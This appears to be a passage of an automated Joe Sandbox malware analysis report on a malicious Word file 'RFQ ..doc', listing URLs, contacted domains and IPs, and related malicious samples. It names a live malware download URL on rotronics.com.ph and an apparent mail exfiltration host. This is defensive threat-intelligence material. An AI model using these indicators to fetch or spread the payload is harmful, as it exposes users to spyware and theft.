                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                  http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                  http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                  http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://www.e-me.lv/repository00%URL Reputationsafe
                  http://www.e-me.lv/repository00%URL Reputationsafe
                  http://www.e-me.lv/repository00%URL Reputationsafe
                  http://www.e-me.lv/repository00%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  http://www.acabogacia.org/doc00%URL Reputationsafe
                  http://www.acabogacia.org/doc00%URL Reputationsafe
                  http://www.acabogacia.org/doc00%URL Reputationsafe
                  http://www.acabogacia.org/doc00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://WWI0qtWzJvCpYcgDStzT.orgDL0%Avira URL Cloudsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://www.ancert.com/cps00%URL Reputationsafe
                  http://www.ancert.com/cps00%URL Reputationsafe
                  http://www.ancert.com/cps00%URL Reputationsafe
                  http://www.ancert.com/cps00%URL Reputationsafe
                  http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe100%Avira URL Cloudmalware
                  http://www.dnie.es/dpc00%URL Reputationsafe
                  http://www.dnie.es/dpc00%URL Reputationsafe
                  http://www.dnie.es/dpc00%URL Reputationsafe
                  http://www.dnie.es/dpc00%URL Reputationsafe
                  http://www.acabogacia.org00%URL Reputationsafe
                  http://www.acabogacia.org00%URL Reputationsafe
                  http://www.acabogacia.org00%URL Reputationsafe
                  http://www.acabogacia.org00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://crl.lt/root-c/cacrl.crl00%Avira URL Cloudsafe
                  http://WWI0qtWzJvCpYcgDStzT.org0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://www.sk.ee/cps/00%URL Reputationsafe
                  http://www.sk.ee/cps/00%URL Reputationsafe
                  http://www.sk.ee/cps/00%URL Reputationsafe
                  http://www.quovadis.bm00%URL Reputationsafe
                  http://www.quovadis.bm00%URL Reputationsafe
                  http://www.quovadis.bm00%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://www.%s.comPA0%URL Reputationsafe
                  http://ZAGYny.com0%Avira URL Cloudsafe
                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl00%URL Reputationsafe
                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl00%URL Reputationsafe
                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl00%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  https://www.netlock.net/docs0%URL Reputationsafe
                  https://www.netlock.net/docs0%URL Reputationsafe
                  https://www.netlock.net/docs0%URL Reputationsafe
                  http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl0%URL Reputationsafe
                  http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl0%URL Reputationsafe
                  http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  http://servername/isapibackend.dll0%Avira URL Cloudsafe
                  http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
                  http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
                  http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  rotronics.com.ph
                  		203.167.7.88
                  		truetrueunknown
                  mail.privateemail.com
                  		198.54.122.60
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exetrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.certicamara.com/certicamaraca.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                      		high
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://127.0.0.1:HTTP/1.1rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://DynDns.comDynDNSrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.e-me.lv/repository0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://sectigo.com/CPS0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.acabogacia.org/doc0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://crl.entrust.net/server1.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                        		high
                        http://ocsp.sectigo.com0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://WWI0qtWzJvCpYcgDStzT.orgDLrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%harghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.entrust.net03rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.ancert.com/cps0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.dnie.es/dpc0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.acabogacia.org0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://rca.e-szigno.hu/ocsp0-rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                          		high
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.diginotar.nl/cps/pkioverheid0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://repository.swisssign.com/0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                            		high
                            http://crl.lt/root-c/cacrl.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://mail.privateemail.comrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmpfalse
                              		high
                              http://WWI0qtWzJvCpYcgDStzT.orgrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350816750.0000000002C06000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350857695.0000000002C4E000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmpfalse
                                		high
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.certicamara.com/certicamaraca.crl0;rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.e-szigno.hu/RootCA.crt0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.sk.ee/cps/0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.e-szigno.hu/SZSZ/0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.quovadis.bm0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.%s.comPArghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		low
                                        http://ZAGYny.comrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://ocsp.entrust.net0Drghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097214520.000000000287D000.00000004.00000001.sdmpfalse
                                          		high
                                          https://secure.comodo.com/CPS0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                                            		high
                                            https://www.netlock.net/docsrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziprghbyjuyktyjrthbgvfsfhytrrgfsd.exefalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://servername/isapibackend.dllrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354978003.0000000008720000.00000002.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://crl.entrust.net/2048ca.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.e-trust.be/CPS/QNcertsrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              203.167.7.88
                                              		rotronics.com.phPhilippines
                                              		32613IWEB-ASCAtrue
                                              198.54.122.60
                                              		mail.privateemail.comUnited States
                                              		22612NAMECHEAP-NETUSfalse

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:385437
                                              Start date:12.04.2021
                                              Start time:14:22:06
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 9s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:RFQ ..doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winDOC@9/14@9/2
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 1.4% (good quality ratio 1.2%)
                                              • Quality average: 56.9%
                                              • Quality standard deviation: 27%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Active ActiveX Object
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 93.184.221.240
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              14:22:37API Interceptor267x Sleep call for process: EQNEDT32.EXE modified
                                              14:22:39API Interceptor1297x Sleep call for process: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe modified
                                              14:22:44API Interceptor3x Sleep call for process: schtasks.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              203.167.7.8801_Enquiry Form.docGet hashmaliciousBrowse
                                              • rotronics.com.ph/docxxx/ff/XnBbf3QlBZhvoNc.exe
                                              198.54.122.60SecuriteInfo.com.Trojan.PackedNET.645.19369.exeGet hashmaliciousBrowse
                                                01_Enquiry Form.docGet hashmaliciousBrowse
                                                  Quotation2001100200.PDF.exeGet hashmaliciousBrowse
                                                    Tepic.exeGet hashmaliciousBrowse
                                                      3.exeGet hashmaliciousBrowse
                                                        New#PO23000.PDF.exeGet hashmaliciousBrowse
                                                          l1I6IIUtw7.exeGet hashmaliciousBrowse
                                                            dCaIlsd8Iu.exeGet hashmaliciousBrowse
                                                              QzieSGrrIc.exeGet hashmaliciousBrowse
                                                                6ptKQe0Bf8.exeGet hashmaliciousBrowse
                                                                  P.O.exeGet hashmaliciousBrowse
                                                                    POM-20120273.PDF.exeGet hashmaliciousBrowse
                                                                      Purchase_order_pdf.exeGet hashmaliciousBrowse
                                                                        purchase_order_pdf.exeGet hashmaliciousBrowse
                                                                          Purchase_order_pdf.exeGet hashmaliciousBrowse
                                                                            Order_BC012356PDF.exeGet hashmaliciousBrowse
                                                                              PAYMENT ADVICE.pdf.exeGet hashmaliciousBrowse
                                                                                RFQ 4917 21-006-AA.docGet hashmaliciousBrowse
                                                                                  Pump_Motor-TENDER SPECIFICATION.docGet hashmaliciousBrowse
                                                                                    Purchase Order_3006164.docGet hashmaliciousBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      rotronics.com.ph01_Enquiry Form.docGet hashmaliciousBrowse
                                                                                      • 203.167.7.88
                                                                                      mail.privateemail.comSecuriteInfo.com.Trojan.PackedNET.645.19369.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      01_Enquiry Form.docGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      Quotation2001100200.PDF.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      Tepic.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      3.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      New#PO23000.PDF.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      l1I6IIUtw7.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      dCaIlsd8Iu.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      QzieSGrrIc.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      6ptKQe0Bf8.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      P.O.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      POM-20120273.PDF.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      Purchase_order_pdf.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      purchase_order_pdf.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      Purchase_order_pdf.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      Order_BC012356PDF.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      PAYMENT ADVICE.pdf.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      RFQ 4917 21-006-AA.docGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      Pump_Motor-TENDER SPECIFICATION.docGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      Purchase Order_3006164.docGet hashmaliciousBrowse
                                                                                      • 198.54.122.60

                                                                                      ASN

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      IWEB-ASCA01_Enquiry Form.docGet hashmaliciousBrowse
                                                                                      • 203.167.7.88
                                                                                      EW098765432.exeGet hashmaliciousBrowse
                                                                                      • 67.205.103.71
                                                                                      HE094355434.exeGet hashmaliciousBrowse
                                                                                      • 67.205.103.71
                                                                                      AS897635632.exeGet hashmaliciousBrowse
                                                                                      • 67.205.103.71
                                                                                      TR09454487654.exeGet hashmaliciousBrowse
                                                                                      • 67.205.103.71
                                                                                      2hDwjaGEBM.apkGet hashmaliciousBrowse
                                                                                      • 174.142.95.82
                                                                                      NmAECL9373.apkGet hashmaliciousBrowse
                                                                                      • 174.142.95.82
                                                                                      2hDwjaGEBM.apkGet hashmaliciousBrowse
                                                                                      • 174.142.95.82
                                                                                      Payment 9.10000 USD.exeGet hashmaliciousBrowse
                                                                                      • 107.161.71.196
                                                                                      Invoice 76221 Secured_Pdf_brianc@johnstoncompanies.com.htmlGet hashmaliciousBrowse
                                                                                      • 64.15.147.113
                                                                                      PO.xlsGet hashmaliciousBrowse
                                                                                      • 174.142.89.59
                                                                                      Io8ic2291n.docGet hashmaliciousBrowse
                                                                                      • 192.175.111.212
                                                                                      code_128_#Ud3f0#Ud2b8(grdoi).jsGet hashmaliciousBrowse
                                                                                      • 184.107.179.26
                                                                                      code_128_#U255e#U2219#U255e#U00ab(ma).jsGet hashmaliciousBrowse
                                                                                      • 184.107.179.26
                                                                                      code_128_#Ud3f0#Ud2b8(grdoi).jsGet hashmaliciousBrowse
                                                                                      • 184.107.179.26
                                                                                      code_128_#U255e#U2219#U255e#U00ab(ma).jsGet hashmaliciousBrowse
                                                                                      • 184.107.179.26
                                                                                      code_128_#U255e#U2219#U255e#U00ab(ma).jsGet hashmaliciousBrowse
                                                                                      • 184.107.179.26
                                                                                      code_128_#U255e#U2219#U255e#U00ab(ma).jsGet hashmaliciousBrowse
                                                                                      • 184.107.179.26
                                                                                      import_export_agency_agreement_template.jsGet hashmaliciousBrowse
                                                                                      • 184.107.179.26
                                                                                      WlYx12M7DM.exeGet hashmaliciousBrowse
                                                                                      • 108.163.130.184
                                                                                      NAMECHEAP-NETUSSecuriteInfo.com.Trojan.PackedNET.645.19369.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      Bank Details.xlsxGet hashmaliciousBrowse
                                                                                      • 198.54.117.212
                                                                                      Import shipment.exeGet hashmaliciousBrowse
                                                                                      • 198.54.126.165
                                                                                      01_Enquiry Form.docGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                      • 198.54.126.105
                                                                                      8Pd6TOKQOf.exeGet hashmaliciousBrowse
                                                                                      • 199.193.7.228
                                                                                      Quotation2001100200.PDF.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      remittance info.xlsxGet hashmaliciousBrowse
                                                                                      • 198.54.117.215
                                                                                      SOA.exeGet hashmaliciousBrowse
                                                                                      • 162.0.229.227
                                                                                      Swift002.exeGet hashmaliciousBrowse
                                                                                      • 198.54.117.211
                                                                                      winlog.exeGet hashmaliciousBrowse
                                                                                      • 198.54.117.217
                                                                                      2021-Quotation.xlsxGet hashmaliciousBrowse
                                                                                      • 199.193.7.228
                                                                                      36ne6xnkop.exeGet hashmaliciousBrowse
                                                                                      • 198.54.126.105
                                                                                      1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                                      • 198.54.126.105
                                                                                      Dridex.xlsGet hashmaliciousBrowse
                                                                                      • 198.54.114.131
                                                                                      Remittance Advice (1).xlsGet hashmaliciousBrowse
                                                                                      • 198.54.114.220
                                                                                      Remittance Advice (1).xlsGet hashmaliciousBrowse
                                                                                      • 198.54.114.220
                                                                                      Remittance Advice (1).xlsGet hashmaliciousBrowse
                                                                                      • 198.54.114.220
                                                                                      giATspz5dw.exeGet hashmaliciousBrowse
                                                                                      • 104.219.248.15
                                                                                      Tepic.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
